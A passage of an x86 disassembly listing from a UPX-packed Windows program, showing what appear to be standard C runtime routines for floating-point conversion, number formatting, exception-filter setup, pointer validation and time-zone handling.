jz short loc_424221
push edi
push 1
push dword ptr [edi]
call sub_425050
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_424208
loc_424221: ; CODE XREF: sub_4241CF+34�j
; sub_4241CF+3B�j
pop edi
pop esi
pop ebx
retn
sub_4241CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424225 proc near ; CODE XREF: sub_424380+81�p
; sub_424380+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_424289
inc ebx
push ebx
push [ebp+arg_0]
call sub_424186
pop ecx
test eax, eax
pop ecx
jnz short loc_424286
push edi
push [ebp+arg_0]
call sub_4241CF
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_424286: ; CODE XREF: sub_424225+51�j
mov eax, [ebp+arg_4]
loc_424289: ; CODE XREF: sub_424225+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_4242A9
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_4242A9: ; CODE XREF: sub_424225+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_424225 endp
; =============== S U B R O U T I N E =======================================
sub_4242B1 proc near ; CODE XREF: sub_424380+75�p
; sub_424380+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_4242BF: ; CODE XREF: sub_4242B1+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_4242BF
pop esi
retn
sub_4242B1 endp
; =============== S U B R O U T I N E =======================================
sub_4242CC proc near ; CODE XREF: sub_424380+5F�p
; sub_424380+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_4242CC endp
; =============== S U B R O U T I N E =======================================
sub_4242D8 proc near ; CODE XREF: sub_424380+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_4242DE: ; CODE XREF: sub_4242D8+12�j
cmp dword ptr [eax], 0
jnz short loc_4242F0
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_4242DE
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_4242F0: ; CODE XREF: sub_4242D8+9�j
xor eax, eax
retn
sub_4242D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4242F3 proc near ; CODE XREF: sub_424380+C0�p
; sub_424380+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_424329: ; CODE XREF: sub_4242F3+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_424329
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_42435B: ; CODE XREF: sub_4242F3+86�j
cmp ebx, edi
jl short loc_42436E
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_424375
; ---------------------------------------------------------------------------
loc_42436E: ; CODE XREF: sub_4242F3+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_424375: ; CODE XREF: sub_4242F3+79�j
dec ebx
sub ecx, 4
jns short loc_42435B
pop edi
pop esi
pop ebx
leave
retn
sub_4242F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424380 proc near ; CODE XREF: sub_4244EC+D�p
; sub_424502+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_4243ED
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_4242D8
test eax, eax
pop ecx
jnz loc_4244AC
lea eax, [ebp+var_C]
push eax
call sub_4242CC
pop ecx
loc_4243E5: ; CODE XREF: sub_424380+E4�j
push 2
loc_4243E7: ; CODE XREF: sub_424380+110�j
pop eax
jmp loc_4244AE
; ---------------------------------------------------------------------------
loc_4243ED: ; CODE XREF: sub_424380+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_4242B1
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_424225
add esp, 10h
test eax, eax
jz short loc_42440E
inc ebx
loc_42440E: ; CODE XREF: sub_424380+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_424426
lea eax, [ebp+var_C]
push eax
call sub_4242CC
pop ecx
jmp short loc_424462
; ---------------------------------------------------------------------------
loc_424426: ; CODE XREF: sub_424380+98�j
cmp ebx, eax
jg short loc_424469
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4242B1
lea eax, [ebp+var_C]
push esi
push eax
call sub_4242F3
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_424225
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_4242F3
add esp, 20h
loc_424462: ; CODE XREF: sub_424380+A4�j
xor esi, esi
jmp loc_4243E5
; ---------------------------------------------------------------------------
loc_424469: ; CODE XREF: sub_424380+A8�j
cmp ebx, [edi]
jl short loc_424495
lea eax, [ebp+var_C]
push eax
call sub_4242CC
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_4242F3
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_4243E7
; ---------------------------------------------------------------------------
loc_424495: ; CODE XREF: sub_424380+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_4242F3
pop ecx
pop ecx
loc_4244AC: ; CODE XREF: sub_424380+55�j
xor eax, eax
loc_4244AE: ; CODE XREF: sub_424380+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_4244DD
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_4244E7
; ---------------------------------------------------------------------------
loc_4244DD: ; CODE XREF: sub_424380+14E�j
cmp edi, 20h
jnz short loc_4244E7
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_4244E7: ; CODE XREF: sub_424380+15B�j
; sub_424380+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_424380 endp
; =============== S U B R O U T I N E =======================================
sub_4244EC proc near ; CODE XREF: sub_424518+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43D358
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_424380
add esp, 0Ch
retn
sub_4244EC endp
; =============== S U B R O U T I N E =======================================
sub_424502 proc near ; CODE XREF: sub_424545+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43D370
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_424380
add esp, 0Ch
retn
sub_424502 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424518 proc near ; CODE XREF: sub_42199B+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4251F1
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_4244EC
add esp, 24h
leave
retn
sub_424518 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424545 proc near ; CODE XREF: sub_42199B+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4251F1
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_424502
add esp, 24h
leave
retn
sub_424545 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424572 proc near ; CODE XREF: sub_4219D9+65�p
; sub_421ADD+63�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_4245AF
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_424595: ; CODE XREF: sub_424572+38�j
mov dl, [ecx]
test dl, dl
jz short loc_4245A1
movsx edx, dl
inc ecx
jmp short loc_4245A4
; ---------------------------------------------------------------------------
loc_4245A1: ; CODE XREF: sub_424572+27�j
push 30h
pop edx
loc_4245A4: ; CODE XREF: sub_424572+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_424595
mov edx, [ebp+arg_8]
loc_4245AF: ; CODE XREF: sub_424572+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_4245C8
cmp byte ptr [ecx], 35h
jl short loc_4245C8
loc_4245BB: ; CODE XREF: sub_424572+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_4245C6
mov byte ptr [eax], 30h
jmp short loc_4245BB
; ---------------------------------------------------------------------------
loc_4245C6: ; CODE XREF: sub_424572+4D�j
inc byte ptr [eax]
loc_4245C8: ; CODE XREF: sub_424572+42�j
; sub_424572+47�j
cmp byte ptr [esi], 31h
jnz short loc_4245D2
inc dword ptr [edx+4]
jmp short loc_4245E4
; ---------------------------------------------------------------------------
loc_4245D2: ; CODE XREF: sub_424572+59�j
push edi
call sub_41AFE0
inc eax
push eax
push edi
push esi
call sub_41CC90
add esp, 10h
loc_4245E4: ; CODE XREF: sub_424572+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_424572 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4245E9 proc near ; CODE XREF: sub_4219D9+3F�p
; sub_421ADD+46�p ...
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_42464D
pop ecx
lea esi, [ebp+var_C]
pop ecx
push offset word_4DBB50
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_4256C2
mov ds:dword_4DBB78, eax
add esp, 18h
movsx eax, ds:byte_4DBB52
mov ds:dword_4DBB70, eax
pop edi
movsx eax, ds:word_4DBB50
mov ds:dword_4DBB74, eax
mov ds:dword_4DBB7C, offset dword_4DBB54
mov eax, offset dword_4DBB70
pop esi
leave
retn
sub_4245E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42464D proc near ; CODE XREF: sub_4245E9+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_42469B
cmp ebx, edi
jz short loc_424694
lea edi, [ecx+3C00h]
jmp short loc_4246BC
; ---------------------------------------------------------------------------
loc_424694: ; CODE XREF: sub_42464D+3D�j
mov edi, 7FFFh
jmp short loc_4246BC
; ---------------------------------------------------------------------------
loc_42469B: ; CODE XREF: sub_42464D+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_4246B3
cmp edx, ebx
jnz short loc_4246B3
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_4246FE
; ---------------------------------------------------------------------------
loc_4246B3: ; CODE XREF: sub_42464D+52�j
; sub_42464D+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_4246BC: ; CODE XREF: sub_42464D+45�j
; sub_42464D+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_4246D4: ; CODE XREF: sub_42464D+A6�j
test ecx, esi
jnz short loc_4246F5
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_4246D4
; ---------------------------------------------------------------------------
loc_4246F5: ; CODE XREF: sub_42464D+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_4246FE: ; CODE XREF: sub_42464D+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_42464D endp
; ---------------------------------------------------------------------------
push 2
call sub_41DA29
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_42470C proc near ; DATA XREF: sub_424752�o
; UPX0:0043CF98�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_42472F
cmp dword ptr [eax+10h], 3
jnz short loc_42472F
cmp dword ptr [eax+14h], 19930520h
jnz short loc_42472F
jmp sub_42255C
; ---------------------------------------------------------------------------
loc_42472F: ; CODE XREF: sub_42470C+D�j
; sub_42470C+13�j ...
mov eax, ds:dword_4DBB80
test eax, eax
jz short loc_42474C
push eax
call sub_4247A8
test eax, eax
pop ecx
jz short loc_42474C
push esi
call ds:dword_4DBB80
jmp short loc_42474E
; ---------------------------------------------------------------------------
loc_42474C: ; CODE XREF: sub_42470C+2A�j
; sub_42470C+35�j
xor eax, eax
loc_42474E: ; CODE XREF: sub_42470C+3E�j
pop esi
retn 4
sub_42470C endp
; =============== S U B R O U T I N E =======================================
sub_424752 proc near ; DATA XREF: UPX0:00429028�o
push offset sub_42470C
call dword_42701C ; SetUnhandledExceptionFilter
mov ds:dword_4DBB80, eax
retn
sub_424752 endp
; =============== S U B R O U T I N E =======================================
sub_424763 proc near ; DATA XREF: UPX0:00429040�o
push ds:dword_4DBB80
call dword_42701C ; SetUnhandledExceptionFilter
retn
sub_424763 endp
; =============== S U B R O U T I N E =======================================
sub_424770 proc near ; CODE XREF: sub_421DB1+6B�p
; sub_4222C2+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call dword_427018 ; IsBadReadPtr
test eax, eax
jz short loc_424788
xor esi, esi
loc_424788: ; CODE XREF: sub_424770+14�j
mov eax, esi
pop esi
retn
sub_424770 endp
; =============== S U B R O U T I N E =======================================
sub_42478C proc near ; CODE XREF: sub_4222C2+73�p
; sub_4222C2+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call dword_4271C8 ; IsBadWritePtr
test eax, eax
jz short loc_4247A4
xor esi, esi
loc_4247A4: ; CODE XREF: sub_42478C+14�j
mov eax, esi
pop esi
retn
sub_42478C endp
; =============== S U B R O U T I N E =======================================
sub_4247A8 proc near ; CODE XREF: sub_4222C2+15B�p
; sub_42470C+2D�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call dword_427014 ; IsBadCodePtr
test eax, eax
jz short loc_4247BC
xor esi, esi
loc_4247BC: ; CODE XREF: sub_4247A8+10�j
mov eax, esi
pop esi
retn
sub_4247A8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42255C
loc_4247C0: ; CODE XREF: sub_42255C:loc_4225AD�j
push 0Ah
call sub_4235C9
push 16h
call sub_425955
pop ecx
pop ecx
push 3
call sub_41B7C2
; END OF FUNCTION CHUNK FOR sub_42255C
; =============== S U B R O U T I N E =======================================
sub_4247D7 proc near ; CODE XREF: sub_422669:loc_4226A8�p
cmp ds:dword_4DBC40, 0
jnz short locret_4247EB
call sub_4247EC
inc ds:dword_4DBC40
locret_4247EB: ; CODE XREF: sub_4247D7+7�j
retn
sub_4247D7 endp
; =============== S U B R O U T I N E =======================================
sub_4247EC proc near ; CODE XREF: sub_4247D7+9�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset aTz ; "TZ"
xor edi, edi
mov ds:dword_4DBB88, ebp
mov dword_43D430, ebx
mov dword_43D420, ebx
call sub_425AC7
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_424915
push offset dword_4DBB90
call dword_4271A0 ; GetTimeZoneInformation
cmp eax, ebx
jz loc_424A44
mov eax, ds:dword_4DBB90
mov ecx, ds:dword_4DBBE4
imul eax, 3Ch
cmp ds:word_4DBBD6, bp
push 1
pop edx
mov dword_43D388, eax
mov ds:dword_4DBB88, edx
jz short loc_424863
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov dword_43D388, eax
loc_424863: ; CODE XREF: sub_4247EC+69�j
cmp ds:word_4DBC2A, bp
jz short loc_424887
mov eax, ds:dword_4DBC38
cmp eax, ebp
jz short loc_424887
sub eax, ecx
mov dword_43D38C, edx
imul eax, 3Ch
mov dword_43D390, eax
jmp short loc_424893
; ---------------------------------------------------------------------------
loc_424887: ; CODE XREF: sub_4247EC+7E�j
; sub_4247EC+87�j
mov dword_43D38C, ebp
mov dword_43D390, ebp
loc_424893: ; CODE XREF: sub_4247EC+99�j
lea eax, [esp+14h+var_4]
mov esi, dword_42717C
push eax
push ebp
push 3Fh
mov edi, 220h
push off_43D414
push ebx
push offset dword_4DBB94
push edi
push ds:dword_4DBA24
call esi ; WideCharToMultiByte
test eax, eax
jz short loc_4248D0
cmp [esp+14h+var_4], ebp
jnz short loc_4248D0
mov eax, off_43D414
and byte ptr [eax+3Fh], 0
jmp short loc_4248D8
; ---------------------------------------------------------------------------
loc_4248D0: ; CODE XREF: sub_4247EC+D1�j
; sub_4247EC+D7�j
mov eax, off_43D414
and byte ptr [eax], 0
loc_4248D8: ; CODE XREF: sub_4247EC+E2�j
lea eax, [esp+14h+var_4]
push eax
push ebp
push 3Fh
push off_43D418
push ebx
push offset dword_4DBBE8
push edi
push ds:dword_4DBA24
call esi ; WideCharToMultiByte
test eax, eax
jz loc_424A3C
cmp [esp+14h+var_4], ebp
jnz loc_424A3C
mov eax, off_43D418
and byte ptr [eax+3Fh], 0
jmp loc_424A44
; ---------------------------------------------------------------------------
loc_424915: ; CODE XREF: sub_4247EC+2D�j
cmp byte ptr [esi], 0
jz loc_424A44
mov eax, ds:dword_4DBC3C
cmp eax, ebp
jz short loc_424938
push eax
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_424A44
loc_424938: ; CODE XREF: sub_4247EC+139�j
push ds:dword_4DBC3C
call sub_41B0B1
push esi
call sub_41AFE0
inc eax
push eax
call sub_41B4D5
add esp, 0Ch
cmp eax, ebp
mov ds:dword_4DBC3C, eax
jz loc_424A44
push esi
push eax
call sub_41BEB0
push 3
push esi
push off_43D414
call sub_41B5F0
mov eax, off_43D414
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_42498D
push 1
inc esi
pop edi
loc_42498D: ; CODE XREF: sub_4247EC+19B�j
push esi
call sub_41B6EE
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov dword_43D388, ecx
loc_4249A4: ; CODE XREF: sub_4247EC+1C7�j
mov al, [esi]
cmp al, 2Bh
jz short loc_4249B2
cmp al, bl
jl short loc_4249B5
cmp al, 39h
jg short loc_4249B5
loc_4249B2: ; CODE XREF: sub_4247EC+1BC�j
inc esi
jmp short loc_4249A4
; ---------------------------------------------------------------------------
loc_4249B5: ; CODE XREF: sub_4247EC+1C0�j
; sub_4247EC+1C4�j
cmp byte ptr [esi], 3Ah
jnz short loc_424A08
inc esi
push esi
call sub_41B6EE
imul eax, 3Ch
pop ecx
mov ecx, dword_43D388
add ecx, eax
mov dword_43D388, ecx
loc_4249D3: ; CODE XREF: sub_4247EC+1F2�j
mov al, [esi]
cmp al, bl
jl short loc_4249E0
cmp al, 39h
jg short loc_4249E0
inc esi
jmp short loc_4249D3
; ---------------------------------------------------------------------------
loc_4249E0: ; CODE XREF: sub_4247EC+1EB�j
; sub_4247EC+1EF�j
cmp byte ptr [esi], 3Ah
jnz short loc_424A08
inc esi
push esi
call sub_41B6EE
pop ecx
mov ecx, dword_43D388
add ecx, eax
mov dword_43D388, ecx
loc_4249FB: ; CODE XREF: sub_4247EC+21A�j
mov al, [esi]
cmp al, bl
jl short loc_424A08
cmp al, 39h
jg short loc_424A08
inc esi
jmp short loc_4249FB
; ---------------------------------------------------------------------------
loc_424A08: ; CODE XREF: sub_4247EC+1CC�j
; sub_4247EC+1F7�j ...
cmp edi, ebp
jz short loc_424A14
neg ecx
mov dword_43D388, ecx
loc_424A14: ; CODE XREF: sub_4247EC+21E�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov dword_43D38C, eax
jz short loc_424A3C
push 3
push esi
push off_43D418
call sub_41B5F0
mov eax, off_43D418
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_424A44
; ---------------------------------------------------------------------------
loc_424A3C: ; CODE XREF: sub_4247EC+10B�j
; sub_4247EC+115�j ...
mov eax, off_43D418
and byte ptr [eax], 0
loc_424A44: ; CODE XREF: sub_4247EC+40�j
; sub_4247EC+124�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_4247EC endp
; =============== S U B R O U T I N E =======================================
sub_424A4A proc near ; CODE XREF: sub_422669+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp dword_43D38C, edi
jnz short loc_424A5E
loc_424A57: ; CODE XREF: sub_424A4A+148�j
; sub_424A4A+150�j ...
xor eax, eax
jmp loc_424BAA
; ---------------------------------------------------------------------------
loc_424A5E: ; CODE XREF: sub_424A4A+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, dword_43D420
jnz short loc_424A7C
cmp eax, dword_43D430
jz loc_424B7E
loc_424A7C: ; CODE XREF: sub_424A4A+24�j
cmp ds:dword_4DBB88, edi
jz loc_424B54
movzx ecx, ds:word_4DBC36
push ecx
cmp ds:word_4DBC28, di
movzx ecx, ds:word_4DBC34
push ecx
movzx ecx, ds:word_4DBC32
push ecx
movzx ecx, ds:word_4DBC30
push ecx
jnz short loc_424ACE
movzx ecx, ds:word_4DBC2C
push edi
push ecx
movzx ecx, ds:word_4DBC2E
push ecx
movzx ecx, ds:word_4DBC2A
push ecx
push eax
push ebx
jmp short loc_424AE2
; ---------------------------------------------------------------------------
loc_424ACE: ; CODE XREF: sub_424A4A+65�j
movzx ecx, ds:word_4DBC2E
push ecx
push edi
movzx ecx, ds:word_4DBC2A
push edi
push ecx
push eax
push edi
loc_424AE2: ; CODE XREF: sub_424A4A+82�j
push ebx
call sub_424BF6
movzx eax, ds:word_4DBBE2
add esp, 2Ch
cmp ds:word_4DBBD4, di
push eax
movzx eax, ds:word_4DBBE0
push eax
movzx eax, ds:word_4DBBDE
push eax
movzx eax, ds:word_4DBBDC
push eax
jnz short loc_424B3C
movzx eax, ds:word_4DBBD8
push edi
push eax
movzx eax, ds:word_4DBBDA
push eax
movzx eax, ds:word_4DBBD6
push eax
push dword ptr [esi+14h]
push ebx
loc_424B31: ; CODE XREF: sub_424A4A+108�j
push edi
call sub_424BF6
add esp, 2Ch
jmp short loc_424B7E
; ---------------------------------------------------------------------------
loc_424B3C: ; CODE XREF: sub_424A4A+C8�j
movzx eax, ds:word_4DBBDA
push eax
push edi
movzx eax, ds:word_4DBBD6
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_424B31
; ---------------------------------------------------------------------------
loc_424B54: ; CODE XREF: sub_424A4A+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_424BF6
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_424BF6
add esp, 58h
loc_424B7E: ; CODE XREF: sub_424A4A+2C�j
; sub_424A4A+F0�j
mov edx, dword_43D424
mov eax, dword_43D434
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_424BAE
cmp ecx, edx
jl loc_424A57
cmp ecx, eax
jg loc_424A57
cmp ecx, edx
jle short loc_424BC2
cmp ecx, eax
jge short loc_424BC2
loc_424BA8: ; CODE XREF: sub_424A4A+166�j
; sub_424A4A+16A�j
mov eax, ebx
loc_424BAA: ; CODE XREF: sub_424A4A+F�j
; sub_424A4A+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_424BAE: ; CODE XREF: sub_424A4A+144�j
cmp ecx, eax
jl short loc_424BA8
cmp ecx, edx
jg short loc_424BA8
cmp ecx, eax
jle short loc_424BC2
cmp ecx, edx
jl loc_424A57
loc_424BC2: ; CODE XREF: sub_424A4A+158�j
; sub_424A4A+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_424BE9
xor ecx, ecx
cmp eax, dword_43D428
setnl cl
loc_424BE5: ; CODE XREF: sub_424A4A+1AA�j
mov eax, ecx
jmp short loc_424BAA
; ---------------------------------------------------------------------------
loc_424BE9: ; CODE XREF: sub_424A4A+18E�j
xor ecx, ecx
cmp eax, dword_43D438
setl cl
jmp short loc_424BE5
sub_424A4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424BF6 proc near ; CODE XREF: sub_424A4A+99�p
; sub_424A4A+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_424C91
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_424C21
shl esi, 2
mov eax, dword_43D438[esi]
jmp short loc_424C2A
; ---------------------------------------------------------------------------
loc_424C21: ; CODE XREF: sub_424BF6+1E�j
shl esi, 2
mov eax, dword_43D46C[esi]
loc_424C2A: ; CODE XREF: sub_424BF6+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jg short loc_424C64
imul eax, 7
